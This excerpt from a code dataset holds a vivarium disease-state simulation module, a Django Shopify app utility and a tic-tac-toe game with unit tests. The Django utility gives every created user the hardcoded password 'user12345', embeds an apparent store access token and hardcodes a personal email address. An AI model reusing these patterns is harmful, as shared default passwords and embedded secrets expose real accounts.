supply a proportion function.\")\n\n        return super().add_transition(output, source_data_type, get_data_functions, **kwargs)\n\n\nclass RecoveredState(BaseDiseaseState):\n    def __init__(self, cause, *args, **kwargs):\n        super().__init__(cause, *args, name_prefix=\"recovered_from_\", **kwargs)\n\n    def add_transition(\n        self,\n        output: State,\n        source_data_type: str = None,\n        get_data_functions: Dict[str, Callable] = None,\n        **kwargs,\n    ) -> Transition:\n        if source_data_type == \"rate\":\n            if get_data_functions is None:\n                get_data_functions = {\n                    \"incidence_rate\": lambda builder, cause: builder.data.load(\n                        f\"{self.cause_type}.{cause}.incidence_rate\"\n                    )\n                }\n            elif \"incidence_rate\" not in get_data_functions:\n                raise ValueError(\"You must supply an incidence rate function.\")\n        elif source_data_type == \"proportion\":\n            if \"proportion\" not in get_data_functions:\n                raise ValueError(\"You must supply a proportion function.\")\n\n        return super().add_transition(output, source_data_type, get_data_functions, **kwargs)\n\n\nclass DiseaseState(BaseDiseaseState):\n    \"\"\"State representing a disease in a state machine model.\"\"\"\n\n    def __init__(self, cause, get_data_functions=None, cleanup_function=None, **kwargs):\n        \"\"\"\n        Parameters\n        ----------\n        cause : str\n            The name of this state.\n        get_data_functions : dict, optional\n            A mapping from a measure name (\"prevalence\", \"birth_prevalence\",\n            \"dwell_time\", \"disability_weight\", \"excess_mortality_rate\") to a\n            function of (builder, cause) that loads that measure's data,\n            overriding the default artifact lookup.\n        cleanup_function : callable, optional\n            A function to be called during this state's clean-up step.\n        \"\"\"\n        super().__init__(cause, **kwargs)\n\n        self.excess_mortality_rate_pipeline_name = f\"{self.state_id}.excess_mortality_rate\"\n        self.excess_mortality_rate_paf_pipeline_name = (\n            f\"{self.excess_mortality_rate_pipeline_name}.paf\"\n        )\n\n        self._get_data_functions = (\n            get_data_functions if get_data_functions is not None else {}\n        )\n        self.cleanup_function = cleanup_function\n\n        if self.cause is None and not set(self._get_data_functions.keys()).issuperset(\n            [\"disability_weight\", \"dwell_time\", \"prevalence\"]\n        ):\n            raise ValueError(\n                \"If you do not provide a cause, you must supply \"\n                \"custom data gathering functions for disability_weight, prevalence, and dwell_time.\"\n            )\n\n    # noinspection PyAttributeOutsideInit\n    def setup(self, builder):\n        \"\"\"Performs this component's simulation setup.\n\n        Parameters\n        ----------\n        builder : `engine.Builder`\n            Interface to several simulation tools.\n        \"\"\"\n        super().setup(builder)\n\n        prevalence_data = self.load_prevalence_data(builder)\n        self.prevalence = builder.lookup.build_table(\n            prevalence_data, key_columns=[\"sex\"], parameter_columns=[\"age\", \"year\"]\n        )\n\n        birth_prevalence_data = self.load_birth_prevalence_data(builder)\n        self.birth_prevalence = builder.lookup.build_table(\n            birth_prevalence_data, key_columns=[\"sex\"], parameter_columns=[\"year\"]\n        )\n\n        dwell_time_data = self.load_dwell_time_data(builder)\n        self.dwell_time = builder.value.register_value_producer(\n            f\"{self.state_id}.dwell_time\",\n            source=builder.lookup.build_table(\n                dwell_time_data, key_columns=[\"sex\"], 
parameter_columns=[\"age\", \"year\"]\n ),\n requires_columns=[\"age\", \"sex\"],\n )\n\n disability_weight_data = self.load_disability_weight_data(builder)\n self.has_disability = is_non_zero(disability_weight_data)\n self.base_disability_weight = builder.lookup.build_table(\n disability_weight_data, key_columns=[\"sex\"], parameter_columns=[\"age\", \"year\"]\n )\n self.disability_weight = builder.value.register_value_producer(\n f\"{self.state_id}.disability_weight\",\n source=self.compute_disability_weight,\n requires_columns=[\"age\", \"sex\", \"alive\", self._model],\n )\n builder.value.register_value_modifier(\n \"disability_weight\", modifier=self.disability_weight\n )\n\n excess_mortality_data = self.load_excess_mortality_rate_data(builder)\n self.has_excess_mortality = is_non_zero(excess_mortality_data)\n self.base_excess_mortality_rate = builder.lookup.build_table(\n excess_mortality_data, key_columns=[\"sex\"], parameter_columns=[\"age\", \"year\"]\n )\n self.excess_mortality_rate = builder.value.register_rate_producer(\n self.excess_mortality_rate_pipeline_name,\n source=self.compute_excess_mortality_rate,\n requires_columns=[\"age\", \"sex\", \"alive\", self._model],\n requires_values=[self.excess_mortality_rate_paf_pipeline_name],\n )\n paf = builder.lookup.build_table(0)\n self.joint_paf = builder.value.register_value_producer(\n self.excess_mortality_rate_paf_pipeline_name,\n source=lambda idx: [paf(idx)],\n preferred_combiner=list_combiner,\n preferred_post_processor=union_post_processor,\n )\n builder.value.register_value_modifier(\n \"mortality_rate\",\n modifier=self.adjust_mortality_rate,\n requires_values=[self.excess_mortality_rate_pipeline_name],\n )\n\n self.randomness_prevalence = builder.randomness.get_stream(\n f\"{self.state_id}_prevalent_cases\"\n )\n\n def get_initial_event_times(self, pop_data: SimulantData) -> pd.DataFrame:\n pop_update = super().get_initial_event_times(pop_data)\n\n simulants_with_condition = self.population_view.subview([self._model]).get(\n pop_data.index, query=f'{self._model}==\"{self.state_id}\"'\n )\n if not simulants_with_condition.empty:\n infected_at = self._assign_event_time_for_prevalent_cases(\n simulants_with_condition,\n self.clock(),\n self.randomness_prevalence.get_draw,\n self.dwell_time,\n )\n pop_update.loc[infected_at.index, self.event_time_column] = infected_at\n\n return pop_update\n\n def compute_disability_weight(self, index):\n \"\"\"Gets the disability weight associated with this state.\n\n Parameters\n ----------\n index\n An iterable of integer labels for the simulants.\n\n Returns\n -------\n `pandas.Series`\n An iterable of disability weights indexed by the provided `index`.\n \"\"\"\n disability_weight = pd.Series(0, index=index)\n with_condition = self.with_condition(index)\n disability_weight.loc[with_condition] = self.base_disability_weight(with_condition)\n return disability_weight\n\n def compute_excess_mortality_rate(self, index):\n excess_mortality_rate = pd.Series(0, index=index)\n with_condition = self.with_condition(index)\n base_excess_mort = self.base_excess_mortality_rate(with_condition)\n joint_mediated_paf = self.joint_paf(with_condition)\n excess_mortality_rate.loc[with_condition] = base_excess_mort * (\n 1 - joint_mediated_paf.values\n )\n return excess_mortality_rate\n\n def adjust_mortality_rate(self, index, rates_df):\n \"\"\"Modifies the baseline mortality rate for a simulant if they are in this state.\n\n Parameters\n ----------\n index\n An iterable of integer labels for the 
simulants.\n        rates_df : `pandas.DataFrame`\n            The population's baseline mortality rates; this state's excess\n            mortality rate is added to them as a new column.\n\n        \"\"\"\n        rate = self.excess_mortality_rate(index, skip_post_processor=True)\n        rates_df[self.state_id] = rate\n        return rates_df\n\n    def with_condition(self, index):\n        pop = self.population_view.subview([\"alive\", self._model]).get(index)\n        with_condition = pop.loc[\n            (pop[self._model] == self.state_id) & (pop[\"alive\"] == \"alive\")\n        ].index\n        return with_condition\n\n    @staticmethod\n    def _assign_event_time_for_prevalent_cases(\n        infected, current_time, randomness_func, dwell_time_func\n    ):\n        dwell_time = dwell_time_func(infected.index)\n        infected_at = dwell_time * randomness_func(infected.index)\n        infected_at = current_time - pd.to_timedelta(infected_at, unit=\"D\")\n        return infected_at\n\n    def add_transition(\n        self,\n        output: State,\n        source_data_type: str = None,\n        get_data_functions: Dict[str, Callable] = None,\n        **kwargs,\n    ) -> Transition:\n        if source_data_type == \"rate\":\n            if get_data_functions is None:\n                get_data_functions = {\n                    \"remission_rate\": lambda builder, cause: builder.data.load(\n                        f\"{self.cause_type}.{cause}.remission_rate\"\n                    )\n                }\n            elif (\n                \"remission_rate\" not in get_data_functions\n                and \"transition_rate\" not in get_data_functions\n            ):\n                raise ValueError(\n                    \"You must supply a transition rate or remission rate function.\"\n                )\n        elif source_data_type == \"proportion\":\n            if \"proportion\" not in get_data_functions:\n                raise ValueError(\"You must supply a proportion function.\")\n        return super().add_transition(output, source_data_type, get_data_functions, **kwargs)\n\n    def next_state(\n        self, index: pd.Index, event_time: pd.Timestamp, population_view: PopulationView\n    ):\n        \"\"\"Moves a population among different disease states.\n\n        Parameters\n        ----------\n        index\n            An iterable of integer labels for the simulants.\n        event_time:\n            The time at which this transition occurs.\n        population_view:\n            A view of the internal state of the simulation.\n        \"\"\"\n        eligible_index = self._filter_for_transition_eligibility(index, event_time)\n        return super().next_state(eligible_index, event_time, population_view)\n\n    def _filter_for_transition_eligibility(self, index, event_time):\n        \"\"\"Filter out all simulants who haven't been in the state for the prescribed dwell time.\n\n        Parameters\n        ----------\n        index\n            An iterable of integer labels for the simulants.\n\n        Returns\n        -------\n        pd.Index\n            A filtered index of the simulants.\n        \"\"\"\n        population = self.population_view.get(index, query='alive == \"alive\"')\n        if np.any(self.dwell_time(index) > 0):\n            state_exit_time = population[self.event_time_column] + pd.to_timedelta(\n                self.dwell_time(index), unit=\"D\"\n            )\n            return population.loc[state_exit_time <= event_time].index\n        else:\n            return index\n\n    def _cleanup_effect(self, index, event_time):\n        if self.cleanup_function is not None:\n            self.cleanup_function(index, event_time)\n\n    def load_prevalence_data(self, builder):\n        if \"prevalence\" in self._get_data_functions:\n            return self._get_data_functions[\"prevalence\"](builder, self.cause)\n        else:\n            return builder.data.load(f\"{self.cause_type}.{self.cause}.prevalence\")\n\n    def load_birth_prevalence_data(self, builder):\n        if \"birth_prevalence\" in self._get_data_functions:\n            return self._get_data_functions[\"birth_prevalence\"](builder, self.cause)\n        else:\n            return 0\n\n    def load_dwell_time_data(self, builder):\n        if \"dwell_time\" in self._get_data_functions:\n            dwell_time = self._get_data_functions[\"dwell_time\"](builder, self.cause)\n        else:\n            dwell_time = 0\n\n        if 
isinstance(dwell_time, pd.Timedelta):\n dwell_time = dwell_time.total_seconds() / (60 * 60 * 24)\n if (\n isinstance(dwell_time, pd.DataFrame) and np.any(dwell_time.value != 0)\n ) or dwell_time > 0:\n self.transition_set.allow_null_transition = True\n\n return dwell_time\n\n def load_disability_weight_data(self, builder):\n if \"disability_weight\" in self._get_data_functions:\n disability_weight = self._get_data_functions[\"disability_weight\"](\n builder, self.cause\n )\n else:\n disability_weight = builder.data.load(\n f\"{self.cause_type}.{self.cause}.disability_weight\"\n )\n\n if isinstance(disability_weight, pd.DataFrame) and len(disability_weight) == 1:\n disability_weight = disability_weight.value[0] # sequela only have single value\n\n return disability_weight\n\n def load_excess_mortality_rate_data(self, builder):\n if \"excess_mortality_rate\" in self._get_data_functions:\n return self._get_data_functions[\"excess_mortality_rate\"](builder, self.cause)\n elif builder.data.load(f\"cause.{self._model}.restrictions\")[\"yld_only\"]:\n return 0\n else:\n return builder.data.load(f\"{self.cause_type}.{self.cause}.excess_mortality_rate\")\n\n def __repr__(self):\n return \"DiseaseState({})\".format(self.state_id)\n\n\nclass TransientDiseaseState(BaseDiseaseState, Transient):\n def __repr__(self):\n return \"TransientDiseaseState(name={})\".format(self.state_id)\n","sub_path":"src/vivarium_public_health/disease/state.py","file_name":"state.py","file_ext":"py","file_size_in_byte":19748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"48397415","text":"from django.contrib.auth.models import User\r\nfrom django.core.exceptions import (PermissionDenied)\r\nfrom rest_framework import serializers\r\nfrom rest_framework_jwt.settings import api_settings\r\n\r\nfrom stores.models import Merchant, Store\r\nfrom vfrlight.config import Config as cfg\r\nfrom vfrlight.tasks import (initilize_webhooks, intitalize_scripttag,\r\n sync_collections, sync_products, getlocaletaskandemail)\r\n\r\n\r\ndef verify_store_access_token(request, store):\r\n jwt_token = request.META.get('HTTP_AUTHORIZATION')\r\n jwt_decode_handler = api_settings.JWT_DECODE_HANDLER\r\n username = jwt_decode_handler(jwt_token.split(' ')[1])['username']\r\n if not store.owner.user.username == username:\r\n raise PermissionDenied()\r\n\r\n\r\ndef get_or_raise(classmodel, **kwargs):\r\n try:\r\n return classmodel.objects.get(**kwargs)\r\n except Exception as e:\r\n raise serializers.ValidationError(e)\r\n\r\n\r\ndef generate_token(user):\r\n jwt_payload_handler = api_settings.JWT_PAYLOAD_HANDLER\r\n jwt_encode_handler = api_settings.JWT_ENCODE_HANDLER\r\n\r\n payload = jwt_payload_handler(user)\r\n token = jwt_encode_handler(payload)\r\n return token\r\n\r\nfrom django.core.mail import send_mail\r\nfrom vfrlight.settings import EMAIL_HOST_USER\r\nimport sys\r\ndef initialize(token, shop, ignore_webhooks=False, ignore_scripttag=False, source=\"connect\"):\r\n try:\r\n user = User.objects.get(\r\n username=(shop + \"_User\"))\r\n merchant = Merchant.objects.get(user=user)\r\n store = Store.objects.get(owner=merchant)\r\n store.token = token\r\n store.save()\r\n except User.DoesNotExist:\r\n user = User.objects.create_user(\r\n username=shop + \"_User\", password='user12345')\r\n merchant = Merchant.objects.create(user=user)\r\n store = Store.objects.create(\r\n url=shop, token=token, owner=merchant)\r\n\r\n if ignore_webhooks:\r\n store.webhooks_added = True\r\n store.save()\r\n if 
ignore_scripttag:\r\n store.scripttag_added = True\r\n store.save()\r\n\r\n if cfg.getLocale:\r\n getLocale(store.slug)\r\n\r\n if cfg.Async:\r\n asynchronous_initialization(store.slug, source)\r\n else:\r\n non_asynchronous_initialization(store.slug, source)\r\n\r\n jwt_payload_handler = api_settings.JWT_PAYLOAD_HANDLER\r\n jwt_encode_handler = api_settings.JWT_ENCODE_HANDLER\r\n\r\n payload = jwt_payload_handler(store.owner.user)\r\n token = jwt_encode_handler(payload)\r\n\r\n return store, token\r\n\r\n\r\ndef asynchronous_initialization(store_slug, source):\r\n # if source == \"connect\" and Store.objects.get(slug=store_slug).did_fetch_data_during_connect is True:\r\n # return\r\n send_mail(\r\n \"Welcome to asynchronous_initialization function\",\r\n \"Hello \",\r\n EMAIL_HOST_USER,\r\n [\"surinder.indybytes@gmail.com\"],\r\n fail_silently=True,\r\n )\r\n initilize_webhooks.delay(store_slug)\r\n intitalize_scripttag.delay(store_slug)\r\n # changed here not condition\r\n if cfg.IGNORE_SYNC_DURING_CONNECT:\r\n sync_products.delay(store_slug)\r\n sync_collections.delay(store_slug)\r\n if source == \"connect\":\r\n Store.objects.filter(slug=store_slug).update(did_fetch_data_during_connect=True)\r\n\r\n\r\ndef getLocale(store_slug):\r\n if cfg.IGNORE_SYNC_DURING_CONNECT:\r\n getlocaletaskandemail(store_slug)\r\n else:\r\n getlocaletaskandemail.delay(store_slug)\r\n\r\n\r\ndef non_asynchronous_initialization(store_slug, source):\r\n # if(not cfg.DEBUG):\r\n # initilize_webhooks(store_slug)\r\n # intitalize_scripttag(store_slug)\r\n if source == \"connect\" and Store.objects.get(slug=store_slug).did_fetch_data_during_connect is True:\r\n return\r\n initilize_webhooks(store_slug)\r\n intitalize_scripttag(store_slug)\r\n # for performance issues, do not sync when you are connecting\r\n if not cfg.IGNORE_SYNC_DURING_CONNECT:\r\n sync_products(store_slug)\r\n sync_collections(store_slug)\r\n if source == \"connect\":\r\n Store.objects.filter(slug=store_slug).update(did_fetch_data_during_connect=True)\r\n\r\n\r\ndef fake_initialize():\r\n initialize('1f145682dd384b589a7f1a2fa1bfc28f',\r\n 'meet10.myshopify.com', ignore_webhooks=True,\r\n ignore_scripttag=True)\r\n","sub_path":"vfrlight/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":4301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"498742032","text":"#!/usr/bin/env python3\n\nfrom typing import Optional, List\n\nimport unittest\n\nclass InvalidMarkers(Exception):\n pass\n\nclass Grid:\n textual_positions = ['top_left', 'top_middle', 'top_right',\n 'middle_left', 'center', 'middle_right',\n 'bottom_left', 'bottom_middle', 'bottom_right']\n def __init__(self, markers: str = \"XO\") -> None:\n if len(markers) != 2:\n raise InvalidMarkers()\n if markers[0] == markers[1]:\n raise InvalidMarkers()\n self.played_positions = dict()\n self.markers = markers\n def is_empty(self) -> bool:\n return len(self.played_positions) == 0\n def is_full(self) -> bool:\n return len(self.played_positions) == 9\n def get_grid(self) -> str:\n if self.is_empty():\n return \" \"*9\n return \"\".join(self.played_positions[posn]\n if posn in self.played_positions else \" \"\n for posn in self.textual_positions)\n def __str__(self) -> str:\n return self.get_grid()\n def play(self, position: str) -> Optional[str]:\n if position in self.played_positions:\n return None\n if position not in self.textual_positions:\n return None\n marker = self.markers[len(self.played_positions)%2]\n 
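# Marks alternate with the parity of plays made so far: markers[0] always\n        # moves first on an empty grid.\n        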
self.played_positions[position] = marker\n return marker\n def get_winning_player(self) -> Optional[str]:\n if self.is_empty() or len(self.played_positions) < 5:\n return None\n winning_lines = [{'top_left', 'middle_left', 'bottom_left'}, # Down\n {'top_middle', 'center', 'bottom_middle'},\n {'top_right', 'middle_right', 'bottom_right'},\n {'top_left', 'top_middle', 'top_right'}, # Across\n {'middle_left', 'center', 'middle_right'},\n {'bottom_left', 'bottom_middle', 'bottom_right'},\n {'top_left', 'center', 'bottom_right'}, # Diagonal\n {'top_right', 'center', 'bottom_left'},\n ]\n for marker in self.markers:\n positions = {k for k, v in self.played_positions.items() if v is marker}\n if len([line for line in winning_lines if positions.issuperset(line)]):\n return marker\n return None\n\nclass TicTacToeTest(unittest.TestCase):\n player_1 = \"X\"\n player_2 = \"O\"\n def make_grid(self):\n return Grid()\n\n def setUp(self):\n self.grid = self.make_grid()\n def test_too_few_markers(self):\n with self.assertRaises(InvalidMarkers):\n grid = Grid(\"O\")\n def test_too_many_markers(self):\n with self.assertRaises(InvalidMarkers):\n grid = Grid(\"OXY\")\n def test_duplicate_markers(self):\n with self.assertRaises(InvalidMarkers):\n grid = Grid(\"OO\")\n def test_havegrid(self):\n assert(self.grid is not None)\n def test_startgrid_is_empty_and_not_full(self):\n assert(self.grid.is_empty())\n self.assertFalse(self.grid.is_full())\n def test_not_empty_and_not_full_after_play_center(self):\n assert(self.grid.play('center'))\n assert(not self.grid.is_empty())\n self.assertFalse(self.grid.is_full())\n def test_play_center_twice_fails(self):\n assert(self.grid.play('center'))\n assert(not self.grid.play('center'))\n def test_play_top_left_twice(self):\n assert(self.grid.play('top_left'))\n assert(not self.grid.play('top_left'))\n def test_play_center_then_top_left(self):\n assert(self.grid.play('center'))\n assert(self.grid.play('top_left'))\n def test_bad_play_position(self):\n self.assertEqual(self.grid.play('cheese'), None)\n def test_all_textual_moves(self):\n for move in Grid.textual_positions:\n self.assertIsNotNone(self.grid.play(move), move)\n def test_is_full_after_all_moves_made(self):\n for move in Grid.textual_positions:\n self.grid.play(move)\n self.assertEqual(self.grid.is_full(), True)\n def test_no_player_won_with_empty_grid(self):\n self.assertEqual(self.grid.get_winning_player(), None)\n def test_no_player_won_after_one_play(self):\n self.grid.play('center')\n self.assertEqual(self.grid.get_winning_player(), None)\n def test_alternating_play_marks(self):\n self.assertEqual(self.grid.play('center'), self.player_1)\n self.assertEqual(self.grid.play('top_left'), self.player_2)\n self.assertEqual(self.grid.play('bottom_middle'), self.player_1)\n self.assertEqual(self.grid.play('bottom_left'), self.player_2)\n def test_many_plays_but_no_player_won_yet(self):\n moves = ['top_left', 'top_right', 'middle_left', 'middle_right', 'center']\n for move in moves:\n self.grid.play(move)\n self.assertEqual(self.grid.get_winning_player(), None)\n\n def _make_plays(self, first_moves, second_moves, grid=None):\n if grid is None:\n grid = self.grid\n moves = first_moves + second_moves\n moves[::2] = first_moves\n moves[1::2] = second_moves\n for move in moves:\n grid.play(move)\n def _get_grids_for_multiple_encoded_plays(self, first_moves, second_moves):\n grids = []\n for game_first, game_second in zip(first_moves, second_moves):\n grid = self.make_grid()\n game_first = [Grid.textual_positions[i] for i 
in game_first]\n            game_second = [Grid.textual_positions[j] for j in game_second]\n            self._make_plays(game_first, game_second, grid)\n            grids.append((grid, game_first, game_second))\n        return grids\n\n    def test_first_player_should_win_on_left(self):\n        moves = ['top_left', 'top_right', 'middle_left', 'middle_right', 'bottom_left']\n        for move in moves:\n            self.grid.play(move)\n        self.assertEqual(self.grid.get_winning_player(), self.player_1)\n    def test_first_player_should_win_on_right(self):\n        moves = ['top_right', 'top_left', 'middle_right', 'middle_left', 'bottom_right']\n        for move in moves:\n            self.grid.play(move)\n        self.assertEqual(self.grid.get_winning_player(), self.player_1)\n    def test_second_player_should_win_on_left(self):\n        moves = ['top_left', 'top_right', 'middle_left', 'middle_right', 'center', 'bottom_right']\n        for move in moves:\n            self.grid.play(move)\n        self.assertEqual(self.grid.get_winning_player(), self.player_2)\n    def test_second_player_should_win_on_right(self):\n        moves = ['top_right', 'top_left', 'middle_right', 'middle_left', 'center', 'bottom_left']\n        for move in moves:\n            self.grid.play(move)\n        self.assertEqual(self.grid.get_winning_player(), self.player_2)\n    def test_second_player_should_win_on_top(self):\n        player_1_moves = ['bottom_left', 'bottom_middle', 'center']\n        player_2_moves = ['top_left', 'top_middle', 'top_right']\n        self._make_plays(player_1_moves, player_2_moves)\n        self.assertEqual(self.grid.get_winning_player(), self.player_2)\n    def test_second_player_should_win_on_bottom(self):\n        player_1_moves = ['top_left', 'top_middle', 'center']\n        player_2_moves = ['bottom_left', 'bottom_middle', 'bottom_right']\n        self._make_plays(player_1_moves, player_2_moves)\n        self.assertEqual(self.grid.get_winning_player(), self.player_2)\n    def test_second_player_should_win_middle_horizontally(self):\n        player_1_moves = ['top_left', 'top_middle', 'bottom_left']\n        player_2_moves = ['middle_left', 'center', 'middle_right']\n        self._make_plays(player_1_moves, player_2_moves)\n        self.assertEqual(self.grid.get_winning_player(), self.player_2)\n    def test_second_player_should_win_middle_vertically(self):\n        player_1_moves = ['top_left', 'bottom_right', 'bottom_left']\n        player_2_moves = ['top_middle', 'center', 'bottom_middle']\n        self._make_plays(player_1_moves, player_2_moves)\n        self.assertEqual(self.grid.get_winning_player(), self.player_2)\n    def test_first_player_should_win_horizontally_x3(self):\n        player_1_moves = [[0,1,2], [3,4,5], [6,7,8]]\n        player_2_moves = [[3,4], [6,7], [0,1]] # Arbitrary valid other moves\n        for grid, first, second in self._get_grids_for_multiple_encoded_plays(player_1_moves, player_2_moves):\n            self.assertEqual(grid.get_winning_player(), self.player_1, (first, second))\n    def test_first_player_should_win_vertically_x3(self):\n        player_1_moves = [[0,3,6], [1,4,7], [2,5,8]]\n        player_2_moves = [[1,2], [2,3], [3,4]] # Arbitrary valid other moves\n        for grid, first, second in self._get_grids_for_multiple_encoded_plays(player_1_moves, player_2_moves):\n            self.assertEqual(grid.get_winning_player(), self.player_1, (first, second))\n    def test_first_player_should_win_diagonally_x2(self):\n        player_1_moves = [[0,4,8], [2,4,6]]\n        player_2_moves = [[1,2], [3,5]] # Arbitrary valid other moves\n        for grid, first, second in self._get_grids_for_multiple_encoded_plays(player_1_moves, player_2_moves):\n            self.assertEqual(grid.get_winning_player(), self.player_1, (first, second))\n    def test_second_player_should_win_horizontally_x3(self):\n        player_1_moves = [[0,1,6], [3,4,1], [6,7,3]] # Arbitrary valid other moves\n        player_2_moves = [[3,4,5], [6,7,8], [0,1,2]]\n        for grid, first, second in self._get_grids_for_multiple_encoded_plays(player_1_moves, player_2_moves):\n            self.assertEqual(grid.get_winning_player(), self.player_2, (first, second))\n    def test_second_player_should_win_vertically_x3(self):\n        player_1_moves = [[0,3,5], [1,4,5], [1,4,6]] # Arbitrary valid other moves\n        player_2_moves = [[1,4,7], [0,3,6], [2,5,8]]\n        for grid, first, second in self._get_grids_for_multiple_encoded_plays(player_1_moves, player_2_moves):\n            self.assertEqual(grid.get_winning_player(), self.player_2, (first, second))\n    def test_second_player_should_win_diagonally_x2(self):\n        player_1_moves = [[1,3,7], [1,0,3]] # Arbitrary valid other moves\n        player_2_moves = [[0,4,8], [2,4,6]]\n        for grid, first, second in self._get_grids_for_multiple_encoded_plays(player_1_moves, player_2_moves):\n            self.assertEqual(grid.get_winning_player(), self.player_2, (first, second))\n    def test_get_grid_at_start(self):\n        self.assertEqual(self.grid.get_grid(), \" \"*9)\n    def test_get_grid_after_all_textual_moves(self):\n        for move in Grid.textual_positions:\n            self.grid.play(move)\n        self.assertEqual(self.grid.get_grid(),\n                         (self.player_1 + self.player_2)*4 + self.player_1)\n    def test_get_grid_after_all_moves_offset_by_3(self):\n        moves = list(range(3,9))\n        moves.extend(list(range(0,3)))\n        for move in moves:\n            self.grid.play(Grid.textual_positions[move])\n        target = (self.player_1 + self.player_2 + self.player_1 +\n                  (self.player_1 + self.player_2)*3)\n        self.assertEqual(self.grid.get_grid(), target)\n    def test_get_grid_after_center_play(self):\n        self.grid.play('center')\n        self.assertEqual(self.grid.get_grid(), \" \"*4 + self.player_1 + \" \"*4)\n    def test_get_grid_same_as_str(self):\n        self.grid.play('center')\n        self.grid.play('top_left')\n        self.grid.play('bottom_right')\n        self.assertEqual(self.grid.get_grid(), \"%s\" % self.grid)\n\nclass TicTacToeTest_XO(TicTacToeTest):\n    player_1 = \"X\"\n    player_2 = \"O\"\n    def make_grid(self):\n        return Grid(\"XO\")\n\nclass TicTacToeTest_OX(TicTacToeTest):\n    player_1 = \"O\"\n    player_2 = \"X\"\n    def make_grid(self):\n        return Grid(\"OX\")\n\nclass TicTacToeTest_star_plus(TicTacToeTest): # Demonstration of arbitrary marker pairs\n    player_1 = \"*\"\n    player_2 = \"+\"\n    def make_grid(self):\n        return Grid(\"*+\")\n\nclass TTTComputer:\n    def __init__(self):\n        self.triples = [ {0, 4, 8}, {2, 4, 6} ] # Diagonals\n        for i in range(0,3):\n            self.triples.append({0+(3*i), 1+(3*i), 2+(3*i)}) # Horizontals\n            self.triples.append({0+i, 3+i, 6+i}) # Verticals\n    def play_on_grid(self, grid: Grid, with_mark: str, vs_mark: str) -> None:\n        grid_s = grid.get_grid()\n        number_of_plays = len([entry for entry in grid_s if entry != \" \"])\n        # Try to win\n        winning_move = self._try_to_win(grid_s, with_mark)\n        if winning_move is not None:\n            grid.play(Grid.textual_positions[winning_move])\n            return\n        # Block any potential losing move\n        avoid_loss_move = self._try_to_avoid_loss(grid_s, vs_mark)\n        if avoid_loss_move: # Non-empty list\n            grid.play(Grid.textual_positions[avoid_loss_move[0]]) # Might be forked, play anyhow\n            return\n        # Try to detect a fork for computer and play there\n        fork_move_for_me = self._detect_fork_move_for_mark(grid_s, with_mark, vs_mark)\n        if fork_move_for_me: # Non-empty list\n            grid.play(Grid.textual_positions[fork_move_for_me[0]])\n            return\n        # Try to detect a fork for opponent and play (block) there\n        fork_move_for_opponent = self._detect_fork_move_for_mark(grid_s, vs_mark, with_mark)\n        if fork_move_for_opponent: # Non-empty list\n            grid.play(Grid.textual_positions[fork_move_for_opponent[0]])\n            return\n        # If center is not taken, take it, except on first move\n        if number_of_plays > 0 and grid_s[4] == \" \":\n            grid.play('center')\n            return\n        # Play in next available space\n        for sequential_move in range(0, 9):\n            if grid_s[sequential_move] == \" \":\n                grid.play(Grid.textual_positions[sequential_move])\n                return\n        return\n    def _try_to_win(self, grid_str: str, with_mark: str) -> Optional[int]:\n        '''Tries to find a move to win; if so, returns index, otherwise None.'''\n        my_marks = {idx for idx, what in enumerate(grid_str) if what == with_mark}\n        # We know we have one entry, so using pop is safe (triple less length=2 item)\n        winning_moves = [(triple - (triple & my_marks)).pop() for triple in self.triples\n                         if len(triple & my_marks) == 2]\n        if winning_moves:\n            empty_winning_moves = [move for move in winning_moves if grid_str[move] == \" \"]\n            if empty_winning_moves:\n                assert(len(empty_winning_moves)==1) # FIXME? Previous code assumed this\n                return empty_winning_moves[0]\n        return None\n    def _try_to_avoid_loss(self, grid_str: str, vs_mark: str) -> List[int]:\n        '''Tries to find if a position must be played to block an opponent's win.\n        If so, returns a list of such positions, otherwise an empty list.'''\n        vs_marks = {idx for idx, what in enumerate(grid_str) if what == vs_mark}\n        # We know we have one entry, so using pop is safe (triple less length=2 item)\n        avoid_loss_moves = [(triple - (triple & vs_marks)).pop() for triple in self.triples\n                            if len(triple & vs_marks) == 2]\n        if avoid_loss_moves:\n            empty_avoid_loss_moves = [move for move in avoid_loss_moves if grid_str[move] == \" \"]\n            if empty_avoid_loss_moves:\n                return empty_avoid_loss_moves\n        return []\n    def _detect_fork_move_for_mark(self, grid_str: str, mark: str, other_mark: str) -> List[int]:\n        '''Tries to find if a position exists where 'mark' can fork.\n        If so, returns a list of forking positions, otherwise an empty list.'''\n        marks = {idx for idx, what in enumerate(grid_str) if what == mark}\n        other_marks = {idx for idx, what in enumerate(grid_str) if what == other_mark}\n        intersecting_triples = [(triple, triple & marks, triple - marks) for triple in self.triples\n                                if (triple & marks) != set() and triple & other_marks == set()]\n        forks = {(a & available).pop() # Can pop since not an empty set\n                 for triple, overlap, available in intersecting_triples\n                 for t, o, a in intersecting_triples\n                 if triple != t and (a & available) != set()}\n        if forks:\n            return list(forks)\n        return []\n\nclass TTT_computer_test(unittest.TestCase):\n    def setUp(self):\n        self.computer = TTTComputer()\n        self.grid = Grid(\"XO\")\n    def assertNumberOfPlaysOnGrid(self, grid_str: str, number_of_plays: int, msg=\"\"):\n        expected_number_of_plays = len([entry for entry in grid_str if entry != \" \"])\n        self.assertEqual(expected_number_of_plays, number_of_plays, msg=msg)\n    def print_grid_2d(self, grid_str: str):\n        grid_str_ = \"\".join([\"_\" if ch == \" \" else ch for ch in grid_str])\n        print()\n        print(grid_str_[0:3])\n        print(grid_str_[3:6])\n        print(grid_str_[6:9])\n        print()\n\n    def test_TTTComputer_exists(self):\n        self.assertIsNotNone(self.computer)\n    def test_computer_play_leaves_grid_not_empty(self):\n        self.assertTrue(self.grid.is_empty())\n        self.computer.play_on_grid(self.grid, \"X\", \"O\")\n        self.assertFalse(self.grid.is_empty())\n    def test_computer_tries_to_win_from_2_in_row_down_left_side(self):\n        self.grid.play('top_left') # X\n        self.grid.play('top_right') # O\n        self.grid.play('bottom_left') # X\n        
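# X already holds top-left and bottom-left; middle-left would complete the column.\n        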
